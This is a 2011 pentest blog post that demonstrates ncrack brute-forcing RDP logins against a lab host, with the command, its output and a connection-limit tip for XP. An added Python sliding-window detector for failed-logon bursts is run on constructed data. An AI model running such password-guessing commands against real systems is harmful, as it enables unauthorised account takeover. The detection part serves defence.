Wednesday, February 9, 2011

Move over tsgrinder/tscrack, hello ncrack!


So thanks to mubix for telling me that ncrack now supports RDP. Very cool stuff.

user@ubuntu:~/pentest/ncrack$ ncrack -vv -d7 --user administrator 192.168.1.100:3389,CL=10

Fetchfile found /usr/local/share/ncrack/default.pwd

Starting Ncrack 0.3ALPHA ( http://ncrack.org ) at 2011-02-09 15:28 PST

rdp://192.168.1.100:3389 (EID 1) Login failed: 'administrator' '123456'
rdp://192.168.1.100:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.96
...
rdp://192.168.1.100:3389 (EID 1518) Login failed: 'administrator' 'pitbull'
rdp://192.168.1.100:3389 (EID 1518) Attempts: total 1519 completed 1513 supported 1 --- rate 3.10
rdp://192.168.1.100:3389 (EID 1520) Login failed: 'administrator' 'geraldine'
rdp://192.168.1.100:3389 (EID 1520) Attempts: total 1520 completed 1514 supported 1 --- rate 3.17
rdp://192.168.1.100:3389 (EID 1522) Login failed: 'administrator' 'allstar'
rdp://192.168.1.100:3389 last: 0.00 current 0.00 parallelism 10
rdp://192.168.1.100:3389 Increasing connection limit to: 10
rdp://192.168.1.100:3389 (EID 1522) Attempts: total 1521 completed 1515 supported 1 --- rate 3.00
...


Keep in mind that against XP you can only have one connection at a time, so you'll have to set your Connection Limit value to 1 (CL=1).
CG
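
Seen from the target, a run like the one above is a long burst of failed logons for one account from one source. The following is an added example, not part of the original post or of ncrack: a sliding-window count over failed-logon records that flags both a fast parallel run and a slower single-connection one while ignoring a few human typos. The record tuple, the window, the threshold, the source addresses and the sample rates are assumptions constructed for the illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # assumed look-back window
THRESHOLD = 20                   # assumed: failures per (source, user) inside WINDOW


def detect_guessing(events, window=WINDOW, threshold=THRESHOLD):
    """events: (timestamp, source_ip, username, success) tuples in time order.
    Returns {(source_ip, username): timestamp of the first alert}."""
    recent = defaultdict(deque)   # (src, user) -> timestamps of recent failures
    alerts = {}
    for ts, src, user, success in events:
        key = (src, user.lower())          # Windows account names are case-insensitive
        if success:
            recent[key].clear()            # a good logon ends the failure streak
            continue
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:    # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = ts
    return alerts


def constructed_failures(start, src, user, count, per_second):
    """Build constructed failed-logon records at a fixed rate (sample data only)."""
    step = timedelta(seconds=1.0 / per_second)
    return [(start + i * step, src, user, False) for i in range(count)]


def sample_events():
    t0 = datetime(2011, 2, 9, 15, 28, 0)
    # Constructed: a parallel run at about 3 attempts/s and a single-connection run at 1/s.
    fast = constructed_failures(t0, "192.168.1.50", "administrator", 300, 3.0)
    slow = constructed_failures(t0, "192.168.1.51", "Administrator", 120, 1.0)
    # Constructed: a user who mistypes a password three times and then logs on.
    human = [(t0 + timedelta(seconds=10 * i), "192.168.1.77", "alice", False) for i in range(3)]
    human.append((t0 + timedelta(seconds=40), "192.168.1.77", "alice", True))
    return sorted(fast + slow + human, key=lambda e: e[0])


if __name__ == "__main__":
    for (src, user), ts in sorted(detect_guessing(sample_events()).items()):
        print(f"{ts.isoformat()} repeated failed logons for {user!r} from {src}")
```

Counting failures inside a window rather than thresholding on attempts per second is what lets the slower single-connection run trip the same rule.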

2 comments:

Anonymous said...

CG, was wondering if you know of any new tools that will BF/Audit RDP when a warning/logon banner is set from the server?

Appears ncrack cannot get past this, tsgrinder has similar limitations, as does the foofus patch for rdesktop.

thx
Jeff

CG said...

Sorry Jeff, I don't.